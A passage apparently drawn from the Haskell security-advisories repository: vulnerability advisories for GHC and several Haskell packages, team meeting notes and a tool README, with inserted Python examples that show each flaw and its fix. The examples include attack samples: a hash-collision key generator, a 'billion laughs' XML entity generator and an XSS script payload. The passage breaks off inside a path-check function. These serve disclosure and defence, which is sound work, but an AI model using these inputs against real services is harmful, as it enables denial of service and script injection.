32 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0008.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0008" 4 | cwe = [194] 5 | keywords = ["integrity", "dos"] 6 | 7 | [[affected]] 8 | ghc-component = "ghc" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "9.2.1" 13 | fixed = "9.6.6" 14 | 15 | [[affected.versions]] 16 | introduced = "9.8.1" 17 | fixed = "9.8.3" 18 | 19 | [[affected.versions]] 20 | introduced = "9.10.1" 21 | 22 | [[references]] 23 | type = "REPORT" 24 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/23034" 25 | 26 | [[references]] 27 | type = "FIX" 28 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/12885" 29 | ``` 30 | 31 | # Sign extension error in the PPC64le FFI 32 | 33 | Numeric arguments of FFI calls on the PPC64le backend may result in incorrect runtime values. 34 | For the most part, this bug only causes availability and data integrity issues. 35 | However, in some circumstances, it may result in other, more complicated security related flaws, such as buffer overflow conditions. 
36 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0001.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0001" 4 | cwe = [682] 5 | keywords = ["integrity", "dos"] 6 | 7 | [[affected]] 8 | ghc-component = "ghc" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "9.12.1" 13 | fixed = "9.12.2" 14 | 15 | [[references]] 16 | type = "REPORT" 17 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/25653" 18 | 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://discourse.haskell.org/t/psa-correctness-issue-in-ghc-9-12/11204" 22 | 23 | [[references]] 24 | type = "FIX" 25 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/13820" 26 | ``` 27 | 28 | # Subword division operations may produce incorrect results 29 | 30 | Arithmetic operations may produce incorrect results when compiled with optimizations. 31 | For the most part, this bug only causes availability and data integrity issues. 32 | However, in some circumstances, it may result in other, more complicated security related flaws, such as buffer overflow conditions. 
33 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0002.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0002" 4 | cwe = [347] 5 | keywords = ["crypto", "historical"] 6 | aliases = ["CVE-2022-31053"] 7 | related = ["GHSA-75rw-34q6-72cr"] 8 | 9 | [[affected]] 10 | package = "biscuit-haskell" 11 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 12 | [[affected.versions]] 13 | introduced = "0.1.0.0" 14 | fixed = "0.2.0.0" 15 | 16 | [[references]] 17 | type = "REPORT" 18 | url = "https://eprint.iacr.org/2020/1484" 19 | [[references]] 20 | type = "ADVISORY" 21 | url = "https://github.com/biscuit-auth/biscuit/security/advisories/GHSA-75rw-34q6-72cr" 22 | 23 | ``` 24 | 25 | # Improper Verification of Cryptographic Signature 26 | 27 | The Biscuit specification version 1 contains a vulnerable algorithm that allows 28 | malicious actors to forge valid Γ-signatures. Such an attack would allow an 29 | attacker to create a token with any access level. Version 2 of the 30 | specification mandates a different algorithm than gamma signatures and as such 31 | is not affected by this vulnerability. 32 | -------------------------------------------------------------------------------- /meeting-notes/2024-06-26.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-06-26 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-06-12.md 5 | 6 | ## GHC numeric bugs [#210](https://github.com/haskell/security-advisories/issues/210) 7 | 8 | - Tristan will prepare advisory 9 | 10 | - For the aarch64 / powerpc issues, these are not base but compiler. 11 | - advisory content would live in `advisories/ghc/compiler`, e.g. 12 | - we need to decide and document the "component" names in the `ghc` namespace 13 | - e.g. 
`compiler`, `GHCi`, `RTS` 14 | - And we will also need to update our OSV generation code to read the 15 | files in the `ghc` subdir and generate the correct osv, using the `GHC` 16 | namespace and the recognised component names. 17 | - We are up to `HSEC-2024-0006` (0004 and 0005 have been reserved) 18 | 19 | ## Snapshot PR 20 | 21 | - Gautier addressed the review comments; Fraser is still 22 | reviewing the updates. 23 | 24 | ## GitHub integration 25 | 26 | - Gautier will reach out to others who already looked at or 27 | thought about this. 28 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0007.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0007" 4 | cwe = [194] 5 | keywords = ["integrity", "dos", "historical"] 6 | 7 | [[affected]] 8 | ghc-component = "ghc" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "9.2.4" 13 | fixed = "9.2.5" 14 | 15 | [[affected.versions]] 16 | introduced = "9.4.2" 17 | fixed = "9.4.3" 18 | 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/22282" 22 | 23 | [[references]] 24 | type = "FIX" 25 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/9152" 26 | 27 | [[references]] 28 | type = "FIX" 29 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/9139" 30 | ``` 31 | 32 | # Sign extension error in the AArch64 NCG 33 | 34 | Arithmetic operations may result in incorrect runtime results on the native aarch64 backend. 35 | For the most part, this bug only causes availability and data integrity issues. 36 | However, in some circumstances, it may result in other, more complicated security related flaws, such as buffer overflow conditions. 
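The last sentence of HSEC-2024-0007 and HSEC-2024-0008 above (an integrity bug that "may result in ... buffer overflow conditions") is easy to state and hard to picture, so here is an added example of the mechanism in Python. It is not GHC's code and not the advisories' code: `widen_buggy` only emulates a backend that leaves a narrow signed value in a wide register with its upper bits zeroed instead of sign-extended, and the buffer, offset window and offsets are constructed for the demonstration.

```python
"""Added example, not GHC's or the advisory's code: how the sign-extension
bugs in HSEC-2024-0007 and HSEC-2024-0008 can turn an integrity problem into
an out-of-bounds memory access.

A narrow signed value (an Int8, say) can reach a wide register with its upper
bits zeroed instead of sign-extended. `widen_buggy` emulates that behaviour,
`widen_correct` the intended one. The buffer, window and offsets are
constructed for the demonstration.
"""

from typing import Callable, Optional


def sign_extend(raw: int, bits: int) -> int:
    """Interpret the low `bits` bits of `raw` as a two's-complement value."""
    raw &= (1 << bits) - 1
    if raw & (1 << (bits - 1)):
        return raw - (1 << bits)
    return raw


def widen_correct(raw_byte: int) -> int:
    """Int8 -> Int as a correct code generator does it: sign-extend."""
    return sign_extend(raw_byte, 8)


def widen_buggy(raw_byte: int) -> int:
    """Int8 -> Int with the bug emulated: upper bits zeroed, so 0xFC (-4) reads as 252."""
    return raw_byte & 0xFF


WINDOW = 8                # the program accepts offsets in [-WINDOW, WINDOW)
BUF = bytes(range(16))    # constructed 16-byte buffer


def relative_read(buf: bytes, base: int, raw_off: int,
                  widen: Callable[[int], int]) -> Optional[int]:
    """Return buf[base + off], where `off` arrives as a raw Int8 bit pattern.

    The range check is done on the narrow value, which the backend computes
    correctly; the widening used for address arithmetic is where the bug bites.
    """
    narrow = sign_extend(raw_off, 8)
    if not -WINDOW <= narrow < WINDOW:
        return None                                  # rejected by the program's own guard
    idx = base + widen(raw_off)
    if not 0 <= idx < len(buf):
        # A native program would silently read past the buffer here.
        raise IndexError(f"out-of-bounds read at index {idx}, buffer length {len(buf)}")
    return buf[idx]


def demo() -> dict:
    """Run the same guarded read with correct and buggy widening for an offset of -4."""
    raw = 0xFC                                       # -4 as an Int8 bit pattern
    result = {"correct": relative_read(BUF, 8, raw, widen_correct)}
    try:
        result["buggy"] = relative_read(BUF, 8, raw, widen_buggy)
    except IndexError as exc:
        result["buggy"] = str(exc)
    return result


if __name__ == "__main__":
    print(demo())
```

The guard passes in both runs because it compares the narrow value; only the address arithmetic sees the zero-extended 252, which is why a range check written against the source type does not protect against this class of miscompilation.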
37 | -------------------------------------------------------------------------------- /meeting-notes/2025-01-08.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-01-08 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-12-11.md 5 | 6 | ## Topics for quarterly report 7 | 8 | - (Actually just Nov + Dec) 9 | - Advisory database 10 | - no new advisories 11 | - one change for a git-annex introduced version (needed to 12 | "introduced from beginning" indication - required for 13 | Flora.pm) 14 | - OSV JSON schema validation 15 | (https://github.com/haskell/security-advisories/pull/254) 16 | - Renovate support (Janus) 17 | - Advisory HTML page layout improvement (Gautier) 18 | - Outstanding efforts 19 | - CVSS 4.0 support 20 | - OSV feedback and user journey 21 | (https://github.com/haskell/security-advisories/issues/252) 22 | 23 | ## GitHub OSSF opportunity 24 | 25 | - Gautier put it to Discourse 26 | - Opportunity closed early January 27 | 28 | ## New meeting time 29 | 30 | - Every 2nd meeting (starting in 2 weeks - Wed 2025-01-22 or Thu 31 | 2025-01-23) to be in an APAC-friendly time. Aiming for EU 32 | overlap. 33 | - Lei to propose time on mailing list. 
34 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0001.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0001" 4 | cwe = [328, 400] 5 | keywords = ["json", "dos", "historical"] 6 | aliases = ["CVE-2022-3433"] 7 | 8 | [[affected]] 9 | package = "aeson" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" 11 | 12 | [[affected.versions]] 13 | introduced = "0.4.0.0" 14 | fixed = "2.0.1.0" 15 | 16 | [[references]] 17 | type = "ARTICLE" 18 | url = "https://cs-syd.eu/posts/2021-09-11-json-vulnerability" 19 | [[references]] 20 | type = "ARTICLE" 21 | url = "https://frasertweedale.github.io/blog-fp/posts/2021-10-12-aeson-hash-flooding-protection.html" 22 | [[references]] 23 | type = "DISCUSSION" 24 | url = "https://github.com/haskell/aeson/issues/864" 25 | ``` 26 | 27 | # Hash flooding vulnerability in aeson 28 | 29 | *aeson* was vulnerable to hash flooding (a.k.a. hash DoS). The 30 | issue is a consequence of the HashMap implementation from 31 | *unordered-containers*. It results in a denial of service through 32 | CPU consumption. This technique has been used in real-world attacks 33 | against a variety of languages, libraries and frameworks over the 34 | years. 35 | -------------------------------------------------------------------------------- /code/hsec-sync/README.md: -------------------------------------------------------------------------------- 1 | # hsec-sync 2 | 3 | Synchronize with the [Haskell advisories database](https://github.com/haskell/security-advisories). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | 9 | ## Design 10 | 11 | [hsec-tools](../hsec-tools/) is the main entry point for dealing with [security advisories](https://github.com/haskell/security-advisories). 
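The hash flooding described in HSEC-2023-0001 above, as an added example in Python; this is not aeson's or unordered-containers' code. `weak_hash` is a generic unkeyed polynomial string hash standing in for any hash an attacker can evaluate offline, the colliding keys are constructed from the two-character blocks "Aa" and "BB" (which collide under it), and the keyed BLAKE2b variant shows the fix pattern: once the hash depends on a per-process secret, the attacker can no longer precompute collisions.

```python
"""Added example, not aeson's or unordered-containers' code: why an unkeyed,
predictable hash lets a client turn one JSON object into a CPU sink
(HSEC-2023-0001), and why a keyed hash stops it.

`weak_hash` is a generic polynomial string hash standing in for any hash
function an attacker can evaluate offline; the colliding keys are constructed
from the two-character blocks "Aa" and "BB", which collide under it.
"""

import hashlib
import os


def weak_hash(s: str) -> int:
    """Unkeyed polynomial hash: h = 31*h + c (mod 2**32)."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h


def make_keyed_hash(secret: bytes):
    """Keyed hash (BLAKE2b with a per-process key): the fix pattern, since
    collisions can no longer be predicted without the key."""
    def keyed_hash(s: str) -> int:
        digest = hashlib.blake2b(s.encode("utf-8"), key=secret, digest_size=8).digest()
        return int.from_bytes(digest, "little")
    return keyed_hash


class ChainedMap:
    """Minimal separate-chaining hash map that counts key comparisons,
    the work an attacker wants to maximise."""

    def __init__(self, hash_fn, nbuckets: int = 1024):
        self.hash_fn = hash_fn
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0

    def insert(self, key: str, value) -> None:
        bucket = self.buckets[self.hash_fn(key) % len(self.buckets)]
        for i, (k, _) in enumerate(bucket):
            self.comparisons += 1
            if k == key:
                bucket[i] = (key, value)
                return
        bucket.append((key, value))


def colliding_keys(n_blocks: int) -> list:
    """2**n_blocks distinct keys with identical weak_hash: "Aa" and "BB" hash
    alike (65*31+97 == 66*31+66), so any concatenation of n such blocks does too."""
    keys = [""]
    for _ in range(n_blocks):
        keys = [k + blk for k in keys for blk in ("Aa", "BB")]
    return keys


def insertion_cost(hash_fn, keys) -> int:
    """Key comparisons needed to insert `keys` as the members of one JSON object."""
    m = ChainedMap(hash_fn)
    for k in keys:
        m.insert(k, None)
    return m.comparisons


if __name__ == "__main__":
    keys = colliding_keys(10)                     # 1024 keys, all in one bucket
    print("distinct weak hashes:", len({weak_hash(k) for k in keys}))
    print("unkeyed hash, comparisons:", insertion_cost(weak_hash, keys))
    print("keyed hash,   comparisons:", insertion_cost(make_keyed_hash(os.urandom(16)), keys))
```

With 1024 colliding keys the unkeyed table does 1024*1023/2 comparisons for a single object; the cost grows quadratically with the key count, which is what makes a few megabytes of JSON enough to pin a CPU. The keyed table spreads the same keys over the buckets and does a few hundred.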
12 | 13 | Library implementors and service providers will mainly be interested in 14 | `Security.Advisories.Queries` and `hsec-tools query`, which allow querying 15 | against a directory containing the advisories. 16 | 17 | There are two ways to keep this local directory up to date: 18 | 19 | * Manually (using `git`, or fetching an archive from GitHub) 20 | * Relying on `hsec-sync` (either via `Security.Advisories.Sync.sync` or `hsec-sync sync`) 21 | 22 | ![overview](./overview.png) 23 | 24 | The recommended workflow is: 25 | 26 | 1. Use `hsec-sync` to create or update a local advisories directory 27 | 2. Use `hsec-tools` to perform queries against it 28 | 29 | ![recommended-workflow](./recommended-workflow.png) 30 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0012.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0012" 4 | cwe = [200] 5 | keywords = ["historical"] 6 | 7 | [[affected]] 8 | package = "git-annex" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" 10 | [[affected.versions]] 11 | introduced = "0.20110417" 12 | fixed = "6.20160419" 13 | 14 | [[references]] 15 | type = "ADVISORY" 16 | url = "https://git-annex.branchable.com/security/checksum_exposure_to_encrypted_special_remotes/" 17 | [[references]] 18 | type = "FIX" 19 | url = "http://source.git-annex.branchable.com/?p=source.git;a=commitdiff;h=b890f3a53d936b5e40aa9acc5876cb98f18b9657" 20 | ``` 21 | 22 | # *git-annex* checksum exposure to encrypted special remotes 23 | 24 | A bug exposed the checksum of annexed files to encrypted special 25 | remotes, which are not supposed to have access to the checksum of 26 | the un-encrypted file. This only occurred when resuming uploads to 27 | the encrypted special remote, so it is considered a low-severity 28 | security hole. 
29 | 30 | For details, see commit `b890f3a53d936b5e40aa9acc5876cb98f18b9657`. 31 | 32 | No CVE was assigned for this issue. 33 | 34 | Fixed in *git-annex-6.20160419*. 35 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0004.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0004" 4 | cwe = [776] 5 | keywords = ["xml", "dos", "historical"] 6 | aliases = ["CVE-2021-4249", "VDB-216204"] 7 | 8 | [[affected]] 9 | package = "xml-conduit" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 11 | 12 | [[affected.versions]] 13 | introduced = "0.5.0" 14 | fixed = "1.9.1.0" 15 | 16 | [[references]] 17 | type = "FIX" 18 | url = "https://github.com/snoyberg/xml/pull/161" 19 | [[references]] 20 | type = "FIX" 21 | url = "https://github.com/snoyberg/xml/commit/4be1021791dcdee8b164d239433a2043dc0939ea" 22 | ``` 23 | 24 | # xml-conduit unbounded entity expansion 25 | 26 | A vulnerability was found in *xml-conduit*. It has been classified 27 | as problematic. The affected code is the DOCTYPE entity expansion 28 | handling in `xml-conduit/src/Text/XML/Stream/Parse.hs`. Manipulated 29 | entity declarations lead to an infinite loop. 30 | The attack can be launched remotely. Upgrading to version 31 | 1.9.1.0 addresses this issue; the fix is commit 32 | `4be1021791dcdee8b164d239433a2043dc0939ea`. It is recommended to 33 | upgrade the affected component. 
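The two guards whose absence HSEC-2023-0004 above describes, a cycle check against self-referential entities (the infinite loop) and a budget against exponential expansion, shown as an added example in Python. This is not xml-conduit's code: the regexes cover only the internal-subset `<!ENTITY name "value">` syntax needed for the demonstration, and the sample documents, including the "billion laughs" generator, are constructed.

```python
"""Added example, not xml-conduit's code: DOCTYPE entity expansion with the
two guards whose absence HSEC-2023-0004 describes, a cycle check (the
infinite loop) and an expansion budget (the "billion laughs" blow-up).

The regexes cover only the internal-subset entity syntax needed for the demo;
the sample documents below are constructed.
"""

import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&(\w+);')


class ExpansionLimit(Exception):
    """Raised for recursive entities or when the expansion budget is exhausted."""


def parse_entities(doctype: str) -> dict:
    """Collect internal general entities from a DOCTYPE internal subset."""
    return dict(ENTITY_DECL.findall(doctype))


def expand(text: str, entities: dict, max_output: int = 10_000) -> str:
    """Expand entity references in `text`.

    `budget` counts characters pulled out of entity values across the whole
    expansion, so total work is bounded by max_output however the entities
    nest; `stack` holds the entities currently being expanded so a self- or
    mutually-referential entity is reported instead of looping forever.
    """
    budget = [max_output]

    def go(s: str, stack: tuple) -> str:
        def repl(m):
            name = m.group(1)
            if name not in entities:
                return m.group(0)            # predefined/unknown refs left alone
            if name in stack:
                raise ExpansionLimit(f"recursive entity &{name};")
            value = entities[name]
            budget[0] -= len(value)
            if budget[0] < 0:
                raise ExpansionLimit(f"entity expansion exceeds {max_output} characters")
            return go(value, stack + (name,))
        return ENTITY_REF.sub(repl, s)

    return go(text, ())


def expand_document(doctype: str, body: str, max_output: int = 10_000) -> str:
    return expand(body, parse_entities(doctype), max_output)


def try_expand(doctype: str, body: str, max_output: int = 10_000) -> tuple:
    """(True, expanded text) on success, (False, reason) when a guard fires."""
    try:
        return True, expand_document(doctype, body, max_output)
    except ExpansionLimit as exc:
        return False, str(exc)


def laughs_document(depth: int) -> tuple:
    """Constructed 'billion laughs' DOCTYPE: each level references the previous
    one ten times, so lol<depth> expands to 10**depth copies of 'lol'."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for i in range(1, depth + 1):
        refs = f"&{prev};" * 10
        decls.append(f'<!ENTITY lol{i} "{refs}">')
        prev = f"lol{i}"
    return "<!DOCTYPE r [" + "".join(decls) + "]>", f"<r>&{prev};</r>"


if __name__ == "__main__":
    print(try_expand('<!DOCTYPE r [<!ENTITY greet "hello">]>', '<r>&greet; world</r>'))
    print(try_expand('<!DOCTYPE r [<!ENTITY a "&a;">]>', '<r>&a;</r>'))
    print(try_expand(*laughs_document(9)))
```

The budget is charged when an entity value is fetched rather than on the final string, so the depth-9 document is rejected after roughly ten thousand characters of work instead of after building a gigabyte; the cycle check fires on the first re-entry, so `<!ENTITY a "&a;">` never recurses.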
34 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0001.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0001" 4 | cwe = [79] 5 | keywords = ["http", "xss", "rxss", "historical"] 6 | 7 | [[references]] 8 | type = "FIX" 9 | url = "https://github.com/snoyberg/keter/pull/246" 10 | 11 | [[affected]] 12 | package = "keter" 13 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N" 14 | declarations."Keter.Proxy.toResponse" = ">= 0.3.4 && < 1.0.1" 15 | declarations."Keter.Proxy.unknownHostResponse" = ">= 1.0.1 && < 1.8.4" 16 | 17 | [[affected.versions]] 18 | introduced = "0.3.4" 19 | fixed = "1.8.4" 20 | ``` 21 | 22 | # Reflected XSS vulnerability in keter 23 | 24 | Keter is an app server and reverse proxy often used with web apps built on the Yesod web framework. 25 | 26 | In the logic handling VHost dispatch, Keter echoed back the `Host` header value, unescaped, 27 | as part of an HTML error page. This constitutes a reflected XSS vulnerability. Although 28 | not readily exploitable directly from a browser (where the `Host` header cannot generally take 29 | arbitrary values), it may become so in the presence of further weaknesses in components 30 | upstream of Keter in the HTTP proxying chain. Hence AC:H (high attack complexity) in the CVSS vector. 
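The pattern HSEC-2024-0001 above describes, an unrecognised `Host` value echoed raw into an HTML error page, beside two hardened variants, as an added example in Python. It is not keter's code: the page markup and the vhost table are constructed and only mirror the shape of the problem, and `HOST_RE` is an assumption about what a served hostname may look like, deliberately narrower than the full header grammar.

```python
"""Added example, not keter's code: the reflected-XSS pattern in
HSEC-2024-0001 (an unrecognised Host header echoed raw into an HTML error
page) beside two hardened variants. The page markup is constructed and only
mirrors the shape of the problem.
"""

import html
import re

# Assumed policy: anything outside letters, digits, '.', '-' and an optional
# ':port' is not a host this proxy serves, so it is never worth echoing.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}(?::\d{1,5})?$")


def unknown_host_page_vulnerable(host: str) -> str:
    """Interpolates the attacker-controlled header straight into HTML."""
    return (
        "<html><body><h1>Unknown host</h1>"
        f"<p>The hostname you have provided, <code>{host}</code>, is not recognized.</p>"
        "</body></html>"
    )


def unknown_host_page_fixed(host: str) -> str:
    """Same page with the header HTML-escaped on output (quote=True also
    escapes quotes, so the value would be safe inside an attribute too)."""
    safe = html.escape(host, quote=True)
    return (
        "<html><body><h1>Unknown host</h1>"
        f"<p>The hostname you have provided, <code>{safe}</code>, is not recognized.</p>"
        "</body></html>"
    )


def dispatch(host_header: str, vhosts: dict, render=unknown_host_page_fixed) -> tuple:
    """Reverse-proxy front door, returning (status, body).

    Known vhosts are proxied; a Host value that cannot be a hostname is
    rejected before any page can reflect it (defence in depth); everything
    else gets the 404 page produced by `render`.
    """
    if host_header in vhosts:
        return 200, f"proxied to {vhosts[host_header]}"
    if not HOST_RE.match(host_header):
        return 400, "<html><body><h1>Bad Request</h1></body></html>"
    return 404, render(host_header)


def reflects_markup(page: str, payload: str) -> bool:
    """True if the raw payload survived into the page unescaped."""
    return payload in page


if __name__ == "__main__":
    vhosts = {"app.example": "127.0.0.1:3000"}       # constructed vhost table
    payload = "<script>alert(1)</script>"
    print(reflects_markup(unknown_host_page_vulnerable(payload), payload))   # True
    print(reflects_markup(unknown_host_page_fixed(payload), payload))        # False
    print(dispatch(payload, vhosts))                                         # (400, ...)
```

Output escaping is the actual fix; the input check is a second line that matters precisely in the scenario the advisory names, a misbehaving upstream proxy that forwards a `Host` value a browser would never send.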
31 | -------------------------------------------------------------------------------- /meeting-notes/2024-03-06.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-03-06 2 | 3 | - Previous meeting: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-02-21.md 5 | 6 | ## pre-ZuriHac ecosystem workshop 7 | 8 | - 6-7 June (before ZuriHac) 9 | - https://haskell.foundation/events/2024-haskell-ecosystem-workshop.html 10 | - Registration is open; fee can be waived for SRT members 11 | - SRT members attending: 12 | - Gautier confirmed, others looking into it. 13 | - Jose wants all of us to attend, if we can. 14 | Other SRT members want to come but need to work out if we can. 15 | 16 | 17 | ## Other updates (things that happened) 18 | 19 | - Update hsec-tools to toml-parser v2 20 | - Fixed web advisory index publishing. 21 | - One historical advisory added (external contributor) 22 | - Mihai has approval to publish the GHA documentation/guide. 23 | He will send to SRT list first, then to researcher. 24 | 25 | ## Outstanding PRs 26 | 27 | - CWE module 28 | ([#116](https://github.com/haskell/security-advisories/pull/116)) 29 | 30 | ## Other work to be done 31 | 32 | - Publishing our libraries on Hackage. 33 | - What is the state of our package docs? Might need some work... 34 | -------------------------------------------------------------------------------- /meeting-notes/2024-08-07.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-08-07 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-07-24.md 5 | 6 | ## Embargoed vulnerability work 7 | 8 | We contacted the affected maintainers and we are coordinating the disclosure. 
9 | 10 | ## haskell.org CRLF injection vulnerability 11 | 12 | Divya Singh reported a vulnerability on the haskell.org website that has been fixed by upgrading the Apache package. 13 | 14 | ## CVSS version 4.0 [#208](https://github.com/haskell/security-advisories/pull/208) 15 | 16 | @unorsk added support for the latest Common Vulnerability Scoring System. 17 | 18 | ## haskell.org blog and security advisories 19 | 20 | We discussed posting security update news to the upcoming haskell.org blog. 21 | 22 | ## Call for Volunteers 23 | 24 | The draft is still in progress. 25 | 26 | ## GitHub Action cabal-audit scan 27 | 28 | * Gautier has started to work on a [GitHub Action](https://github.com/blackheaven/haskell-security-action) which aims to run `cabal audit` 29 | * Still under development, most of the code is done (i.e. push results to the security section of the repository) 30 | * Packaging issues mainly for the moment 31 | -------------------------------------------------------------------------------- /meeting-notes/2024-11-13.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-11-13 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-10-30.md 5 | 6 | ## Q3(+) report 7 | 8 | The report is proposed: [#244](https://github.com/haskell/security-advisories/pull/244). We will reproduce it on Discourse tomorrow, and submit a PR to update https://www.haskell.org/security/. 9 | 10 | ## SRT Process 11 | 12 | We should document more thoroughly the SRT processes 13 | (administrative), particularly since we went through our first 14 | vacancy->new appointments cycle. 
15 | 16 | ## GHC Math bugs 17 | 18 | The advisories are updated and available for review: [#214](https://github.com/haskell/security-advisories/pull/214) 19 | 20 | ## flora integration 21 | 22 | [flora](https://github.com/flora-pm/flora-server/) has pinged Gautier and Fraser 23 | regarding [security advisories integration PR#762](https://github.com/flora-pm/flora-server/pull/762). 24 | 25 | After a discussion between Gautier and Hecate (the maintainer), flora will 26 | integrate advisories search and the decision was made to replicate the advisories 27 | structure in PostgreSQL. 28 | 29 | Perhaps we should recommend using the OSV export instead? 30 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0005.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0005" 4 | cwe = [295] 5 | keywords = ["x509", "pki", "mitm", "historical"] 6 | aliases = ["CVE-2013-0243"] 7 | 8 | [[affected]] 9 | package = "tls-extra" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" 11 | 12 | [[affected.versions]] 13 | introduced = "0.1.0" 14 | fixed = "0.4.6.1" 15 | 16 | [[references]] 17 | type = "DISCUSSION" 18 | url = "https://www.openwall.com/lists/oss-security/2013/01/30/6" 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://github.com/haskell-tls/hs-tls/issues/29" 22 | [[references]] 23 | type = "FIX" 24 | url = "https://github.com/haskell-tls/hs-tls/commit/15885c0649ceabd2f4d2913df8ac6dc63d6b3b37" 25 | ``` 26 | 27 | # tls-extra: certificate validation does not check Basic Constraints 28 | 29 | *tls-extra* does not check the Basic Constraints extension of a 30 | certificate in certificate chain processing. Any certificate is 31 | treated as a CA certificate. 
As a consequence, anyone who has a 32 | valid certificate can use it to sign another one (with an arbitrary 33 | subject DN/domain name embedded into it) and have it accepted by 34 | *tls*. This allows MITM attacks on TLS connections. 35 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0014.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0014" 4 | keywords = ["file write"] 5 | aliases = ["CVE-2023-35936", "GHSA-xj5q-fv23-575g"] 6 | cwe = [20] 7 | 8 | [[references]] 9 | type = "REPORT" 10 | url = "https://github.com/jgm/pandoc/security/advisories/GHSA-xj5q-fv23-575g" 11 | 12 | [[affected]] 13 | package = "pandoc" 14 | cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:L" 15 | 16 | [[affected.versions]] 17 | introduced = "1.13" 18 | fixed = "3.1.4" 19 | 20 | ``` 21 | # Arbitrary file write is possible when using PDF output or --extract-media with untrusted input 22 | 23 | Pandoc is susceptible to an arbitrary file write vulnerability, which can be triggered by providing a specially crafted image element in the input when generating files using the --extract-media option or outputting to PDF format. This vulnerability allows an attacker to create or overwrite arbitrary files on the system (depending on the privileges of the process running pandoc). 24 | 25 | This vulnerability only affects systems that (a) pass untrusted user input to pandoc and (b) allow pandoc to be used to produce a PDF or with the --extract-media option. 26 | 27 | The vulnerability is patched in pandoc 3.1.4. 
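The containment check that an `--extract-media` style feature needs before it writes a file whose name comes from the input document (HSEC-2023-0014 above), as an added example in Python. It is not pandoc's code: the image sources and the media directory are constructed, and the check is the general one for any "write under a directory using an untrusted name" operation, covering absolute paths, `..` segments, percent-encoding and URL schemes rather than only the case the advisory mentions.

```python
"""Added example, not pandoc's code: the containment check an --extract-media
style feature needs before writing a file named by the input document
(HSEC-2023-0014). The image sources and media directory are constructed.
"""

import os
import tempfile
from typing import Optional
from urllib.parse import unquote, urlparse


def media_target(media_dir: str, image_src: str) -> Optional[str]:
    """Path under media_dir where `image_src` may be written, or None.

    The document controls `image_src`; it may carry a scheme, percent-encoding,
    '..' segments or an absolute path. Resolve the candidate with realpath (so
    symlinks already present under media_dir are followed) and require the
    result to stay inside the real media directory.
    """
    root = os.path.realpath(media_dir)
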